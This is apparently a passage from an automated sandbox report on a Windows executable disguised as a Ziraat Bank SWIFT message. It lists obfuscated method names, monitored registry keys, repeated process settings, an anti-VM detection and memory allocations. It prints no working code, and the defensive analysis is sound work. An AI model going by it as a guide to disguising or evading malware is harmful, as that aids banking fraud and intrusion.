                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, p5gR3YeLcoeRkbfqcL.csHigh entropy of concatenated method names: 'hdBtM2jQ31', 'DAPtBTuOG4', 'sHxtCyQiLg', 'cKetsWfDd9', 'pUYtVSSF7t', 'xn5tO5u7xE', 'ECPtQYaHVB', 'qRstcBfivW', 'Y3EtZA07eo', 'hKrtlSmPvo'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, QnOtmkR2qUl6FporFc.csHigh entropy of concatenated method names: 'btX8Jn1OXR', 'Fa687F9nlu', 'mkI3E2iH0y', 'n9C3D1wBry', 'bSh8AVHWBf', 'rsL8je2jFH', 'Gtb8ULQnp0', 'rSE8SlilVw', 'vGn8f0vGxN', 'TSN8m2mHS5'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, AIq35SIhf0tgilOgBS.csHigh entropy of concatenated method names: 'DiP1nicj2NwGZLhpPRG', 'Dql4iIchtCJvsMa066D', 'UVak3doSBY', 'UTYkrQEeLA', 'mOFkyXl1uK', 'r2tsELc7T5CPPx2vt2h', 'q58Bd7c3FZJIdx1YFqE', 'mc3Q6fcP6NU4oRDjf9R'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, TC6OUpYujNeeZfNAX5.csHigh entropy of concatenated method names: 'O1NCZ2bxK', 'D2BsA80hF', 'sxFOZN2yS', 'YQrQnpvIQ', 'oHjZ9KXNi', 's2pldFTHu', 'tjMml0XSXqfiKMwrUU', 'DOGBDBFwmUAEwRv051', 'f763M5SFa', 'slsypLGMA'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, fMlgOmzveg4IUwP5A4.csHigh entropy of concatenated method names: 'RqfyO1wZnu', 'jEQycS0VjZ', 'IIGyZqAvAg', 'vwdygTBbp9', 'W3ZyIfirn9', 'Y9xy1VPuIx', 'vojyHQ8VPW', 'Br5yxcBINI', 'EeOyM6oH1I', 'zPkyB34ZXi'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, GdoDfXUk8Co9lI9UX1.csHigh entropy of concatenated method names: 'hwJqc5IeUf', 'vukqZDRGTL', 'z2fqglcDCV', 'glgqIjI60y', 'bJXq1CAS5q', 'PvFqHgIgwi', 'GBuqaBu9aV', 'NEoq6pKciq', 'W2aq0cdI8U', 'JswqAsSi4v'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, zDkdNac4quC1dMYuE6.csHigh entropy of concatenated method names: 'S1gGSohreR', 'cxiGfXoqJ2', 'XU6GmlfF5F', 'ma1GnQpUQl', 'ic0GbnPu67', 'UbPGRh2cMy', 'fmpGvmgBTo', 'JjoGJQREMi', 'b8cGTDPoW9', 'fkPG743qo9'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, hEY9mpSPhLvFuIksLJ.csHigh entropy of concatenated method names: 'WMGK0H5Weo', 'xTbKjbqN8w', 'lfEKS8sf2c', 'aZQKfdTZmn', 'n3HKIShP1W', 'GoSK5kl6uv', 'ObrK1WDZ6T', 'AkcKHCsUOq', 'wrGK4uyr40', 'oBbKa9MRIp'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, EfoMYs93yOq7Xq1gsC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EWhYTbfMML', 'YR9Y7wsW08', 'HtLYz0tGrq', 'ToQpEQKK5s', 'GltpDLpxgK', 'ubWpYmI7OQ', 'waHppYj9QO', 'rA9xD4wK034Y76tafcJ'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, eeHsS0DEfSHcKjc7qMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ji0yAqYUW0', 'lleyjuNR2i', 'qipyURkAnU', 'iWXySSNpOa', 'E6Fyf8qKxf', 'MOMymExYwV', 'xPFyn2u7fq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, YeYnh7wEhkC3yHHIic.csHigh entropy of concatenated method names: 'wgVpiZB8ny', 'v7Zpo3eNeW', 'MIUpGYbfSW', 'Mxip9VfQ0S', 'Eh2pu5WlDk', 'hjSpk4EcXr', 'bi3ptt71UB', 'q5npw57Ry8', 'mRxpdiaZ4C', 'L1epLvPG0T'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, D70GfmDDlKC4aL7Y8iI.csHigh entropy of concatenated method names: 'Vx0y7GqEhn', 'MXkyz4xfX0', 'rG1PEtb9Eu', 'YAUPD3Ktmx', 'wfdPYjioeY', 'VqdPpn4viS', 'n6BPWJJcH1', 'OPnPiuO1Dx', 'LCDPokX6oX', 'I04PGb0gZt'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, mwHhREmZa5jqOUg3WF.csHigh entropy of concatenated method names: 'ToString', 'u1xhAppFEb', 'zy9hIdOsPY', 'iRUh5IxWRk', 'm6fh18XQQw', 'VcShH6oq8n', 'oSTh4oo094', 'ovihatj8BD', 'XFsh688Tdf', 'DuUheIB2Pq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.40c6928.1.raw.unpack, L79jj4ZbYalPC19Dc7.csHigh entropy of concatenated method names: 'H5e9scqLK3', 'Vit9O9H6hD', 'No19chfumu', 'RMG9ZUuTF6', 'EtF9KJKH2M', 'NXU9h3OsaS', 'dcu98lrUgM', 'Rgn93ve5Zo', 'ism9rPxqku', 'joD9yZXgCL'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, MNIK2Vv6XXyABXoe9x.csHigh entropy of concatenated method names: 'jGdrKR2UJM', 'seCr8IRd0C', 'YaArrjJ8pX', 'qcvrPQcQOQ', 'eq8rNS1Ck6', 'XV8rxvL2f8', 'Dispose', 'Ypi3oKWQZj', 'x1O3GiwSwK', 'aXq39ANcT4'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, HQa78ineXBqsgxt74y.csHigh entropy of concatenated method names: 'BEj8L9jtgL', 'UlI8FgsA4K', 'ToString', 'ND48ochQTx', 'RaG8G2DCvC', 'QSF89Wtfad', 'e1I8uRUZ2x', 'wiU8kwixmw', 'Ged8tMK2BY', 'o6J8w6o8go'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YmLdhITMvcbPgRbWjO.csHigh entropy of concatenated method names: 'YqcrgGTjW6', 'oWarIkLmU5', 'E4jr5c8wDl', 'LpHr1QTXnE', 'gg5rHJvLrn', 'IShr406xb6', 'SC7rargAOX', 'mNcr649Jke', 'iM5re6aa4j', 'V4br0Jh8Y6'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, hBGRCU7eQIJyYfuchM.csHigh entropy of concatenated method names: 'HXVy9sCT2P', 'WZGyu69Mlq', 'j6JykVWgBG', 'P0PytMONW8', 'ESVyrFu6aL', 'JRPywVdVNu', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, VquffsWhmNp9XiftwX.csHigh entropy of concatenated method names: 'kCCDtDkdNa', 'KquDwC1dMY', 'KbYDLalPC1', 'gDcDF7y5bC', 'OvMDKrt8jN', 'pF4DhX9Jxa', 'PFbAfFn2o60h9GWLkg', 'na80CrVfKCqYFYnI84', 'ol0DDbZnOm', 'UEqDp46aBE'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, IcqGiAaLc8ctDUl2qP.csHigh entropy of concatenated method names: 'RqotoLs08v', 'Kpht9ABNme', 'P2ItkD5L3w', 'Fxik7vxcSL', 'gqxkzTM2kd', 'SqFtEHcBwo', 'sAWtDoKhmZ', 'J1etY9B7al', 'L5ktpA7l5a', 'FsPtWjw7ib'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, s5bC9bleaXdtD0vMrt.csHigh entropy of concatenated method names: 'mcwuVu8XPO', 'LRYuQBZvMR', 'p8J9560gm2', 'FcB91ZXtRU', 'M1x9HEbNtd', 'zci94QeKjg', 'p1g9aLoM6r', 'OY196IPjnL', 'e1Q9eTgVCD', 'sOk90dGSAN'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, Bhp9KYDWdpwU9fBLD0e.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wuAXr8Jw3O', 'JWpXy2gGGQ', 'fSSXP2YYRH', 'xRiXXPWiT7', 'akoXNmAZkQ', 'g8WX2qiyQT', 'p7YXxKttEU'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, qjNhF4gX9JxaMbd99Z.csHigh entropy of concatenated method names: 'stKkirWfG1', 'kOwkGsNINL', 'K9NkurhsQe', 'YxiktJkQBo', 'lKJkwgEuMM', 'NpwubpCo4H', 'AXquRyQwRD', 'eyOuv30oJO', 't4wuJgtIXW', 'HLruTHaxlx'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, ueYB17GD7q56AKrf8L.csHigh entropy of concatenated method names: 'Dispose', 'uyADTBXoe9', 'qX0YIvF1fb', 'Y3UswydjVq', 'xAND7vL51S', 'w24DzGGCkg', 'ProcessDialogKey', 'JG7YEmLdhI', 'xvcYDbPgRb', 'djOYY9BGRC'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, p5gR3YeLcoeRkbfqcL.csHigh entropy of concatenated method names: 'hdBtM2jQ31', 'DAPtBTuOG4', 'sHxtCyQiLg', 'cKetsWfDd9', 'pUYtVSSF7t', 'xn5tO5u7xE', 'ECPtQYaHVB', 'qRstcBfivW', 'Y3EtZA07eo', 'hKrtlSmPvo'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, QnOtmkR2qUl6FporFc.csHigh entropy of concatenated method names: 'btX8Jn1OXR', 'Fa687F9nlu', 'mkI3E2iH0y', 'n9C3D1wBry', 'bSh8AVHWBf', 'rsL8je2jFH', 'Gtb8ULQnp0', 'rSE8SlilVw', 'vGn8f0vGxN', 'TSN8m2mHS5'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, AIq35SIhf0tgilOgBS.csHigh entropy of concatenated method names: 'DiP1nicj2NwGZLhpPRG', 'Dql4iIchtCJvsMa066D', 'UVak3doSBY', 'UTYkrQEeLA', 'mOFkyXl1uK', 'r2tsELc7T5CPPx2vt2h', 'q58Bd7c3FZJIdx1YFqE', 'mc3Q6fcP6NU4oRDjf9R'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, TC6OUpYujNeeZfNAX5.csHigh entropy of concatenated method names: 'O1NCZ2bxK', 'D2BsA80hF', 'sxFOZN2yS', 'YQrQnpvIQ', 'oHjZ9KXNi', 's2pldFTHu', 'tjMml0XSXqfiKMwrUU', 'DOGBDBFwmUAEwRv051', 'f763M5SFa', 'slsypLGMA'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, fMlgOmzveg4IUwP5A4.csHigh entropy of concatenated method names: 'RqfyO1wZnu', 'jEQycS0VjZ', 'IIGyZqAvAg', 'vwdygTBbp9', 'W3ZyIfirn9', 'Y9xy1VPuIx', 'vojyHQ8VPW', 'Br5yxcBINI', 'EeOyM6oH1I', 'zPkyB34ZXi'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, GdoDfXUk8Co9lI9UX1.csHigh entropy of concatenated method names: 'hwJqc5IeUf', 'vukqZDRGTL', 'z2fqglcDCV', 'glgqIjI60y', 'bJXq1CAS5q', 'PvFqHgIgwi', 'GBuqaBu9aV', 'NEoq6pKciq', 'W2aq0cdI8U', 'JswqAsSi4v'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, zDkdNac4quC1dMYuE6.csHigh entropy of concatenated method names: 'S1gGSohreR', 'cxiGfXoqJ2', 'XU6GmlfF5F', 'ma1GnQpUQl', 'ic0GbnPu67', 'UbPGRh2cMy', 'fmpGvmgBTo', 'JjoGJQREMi', 'b8cGTDPoW9', 'fkPG743qo9'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, hEY9mpSPhLvFuIksLJ.csHigh entropy of concatenated method names: 'WMGK0H5Weo', 'xTbKjbqN8w', 'lfEKS8sf2c', 'aZQKfdTZmn', 'n3HKIShP1W', 'GoSK5kl6uv', 'ObrK1WDZ6T', 'AkcKHCsUOq', 'wrGK4uyr40', 'oBbKa9MRIp'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, EfoMYs93yOq7Xq1gsC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EWhYTbfMML', 'YR9Y7wsW08', 'HtLYz0tGrq', 'ToQpEQKK5s', 'GltpDLpxgK', 'ubWpYmI7OQ', 'waHppYj9QO', 'rA9xD4wK034Y76tafcJ'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, eeHsS0DEfSHcKjc7qMU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ji0yAqYUW0', 'lleyjuNR2i', 'qipyURkAnU', 'iWXySSNpOa', 'E6Fyf8qKxf', 'MOMymExYwV', 'xPFyn2u7fq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, YeYnh7wEhkC3yHHIic.csHigh entropy of concatenated method names: 'wgVpiZB8ny', 'v7Zpo3eNeW', 'MIUpGYbfSW', 'Mxip9VfQ0S', 'Eh2pu5WlDk', 'hjSpk4EcXr', 'bi3ptt71UB', 'q5npw57Ry8', 'mRxpdiaZ4C', 'L1epLvPG0T'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, D70GfmDDlKC4aL7Y8iI.csHigh entropy of concatenated method names: 'Vx0y7GqEhn', 'MXkyz4xfX0', 'rG1PEtb9Eu', 'YAUPD3Ktmx', 'wfdPYjioeY', 'VqdPpn4viS', 'n6BPWJJcH1', 'OPnPiuO1Dx', 'LCDPokX6oX', 'I04PGb0gZt'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, mwHhREmZa5jqOUg3WF.csHigh entropy of concatenated method names: 'ToString', 'u1xhAppFEb', 'zy9hIdOsPY', 'iRUh5IxWRk', 'm6fh18XQQw', 'VcShH6oq8n', 'oSTh4oo094', 'ovihatj8BD', 'XFsh688Tdf', 'DuUheIB2Pq'
                Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.4122f48.2.raw.unpack, L79jj4ZbYalPC19Dc7.csHigh entropy of concatenated method names: 'H5e9scqLK3', 'Vit9O9H6hD', 'No19chfumu', 'RMG9ZUuTF6', 'EtF9KJKH2M', 'NXU9h3OsaS', 'dcu98lrUgM', 'Rgn93ve5Zo', 'ism9rPxqku', 'joD9yZXgCL'
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Ziraat Bankasi Swift Mesaji.exe PID: 6516, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 46D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 77F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 6A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 87F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMemory allocated: 97F0000 memory reserve | memory write watchJump to behavior
